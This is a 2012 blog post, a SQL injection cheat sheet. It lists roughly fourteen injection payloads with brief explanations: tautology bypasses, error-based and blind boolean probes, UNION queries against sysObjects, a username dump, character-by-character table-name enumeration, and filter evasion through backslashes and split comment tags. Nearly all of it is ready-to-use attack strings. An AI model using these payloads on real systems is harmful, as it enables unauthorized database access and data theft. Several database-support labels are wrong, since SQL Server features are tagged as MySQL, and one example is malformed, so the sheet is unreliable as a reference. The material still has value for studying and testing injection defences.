About Me

Wednesday, 11 April 2012

SQLi Cheat Sheet

SQL Injection: Normal SQL Injection:


Code:
1 OR 1=1
Database support: [mySQL]

#~#
Normal SQL Injection using encapsulated data:


Code:
1' OR '1'='1
Database support: [mySQL]

#~#
Blind SQL Injection to throw an error to validate that encapsulation isn't working. The goal here is to throw an error to cause the application to show us that it is not encapsulating quotes correctly:


Code:
1'1
Database support: [mySQL]

#~#
Blind SQL Injection creating an error using EXEC:


Code:
1 EXEC SP_ (or EXEC XP_)
Database support: [mySQL]

#~#
Blind SQL Injection detection (this shouldn't give us the same result if filtering is in place as we would get if we excluded the AND 1 = 1 part. If it does give us the same result it shows that the application is vulnerable):


Code:
1 AND 1=1
Database support: [mySQL]

#~#
Blind SQL Injection to attempt to locate tablenames by brute force iteration through potential names (you'll have to rename tablenames until you find a match):


Code:
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Database support: [mySQL]

#~#
Using the USER_NAME() function in SQL Server to tell us if the user is running as the administrator:


Code:
1 AND USER_NAME() = 'dbo'
Database support: [mySQL | SQL]

#~#
Evading escapes with backslashes (this assumes the application comments out a single quote with another single quote and by introducing a backslash before it, it comments out the singlequote that is added by the filter). This type of filter is applied by mySQL's mysql_real_escape_string() and PERL's DBD method $dbh->quote():


Code:
\'; DESC users; --
Database support: [mySQL | SQL]

#~#
More blind SQL Injection by attempting to create an error using the backslash method seen above:


Code:
1\'1
Database support: [mySQL | SQL]

#~#
Creating errors by calling fake tables. This can help expose vulnerable applications by attempting to create an error by calling tables that are nonexistant (try this with and without the quotes):


Code:
1' AND non_existant_table = '1
Database support: [mySQL | SQL]

#~#
Dumping usernames (assuming there is a username table and quotes are not escaped):


Code:
' OR username IS NOT NULL OR username = '
Database support: [mySQL | SQL]

#~#
Enumerating through database table names. By changing the 116 to different numbers you can use logrithmic reduction to find the first char of the database table name. Then iterating through the first 1 in 1, 1 you can eventually get the whole table name.


Code:
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Database support: [mySQL | SQL]

#~#
Finding user supplied tables using the sysObjects table in SQL Server:


Code:
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Database support: [mySQL | SQL]

#~#
Bypassing filter evasion using comment tags:


Code:
1 UNI/**/ON SELECT ALL FROM WHERE
Database support: [mySQL | SQL]

0 comments:

Post a Comment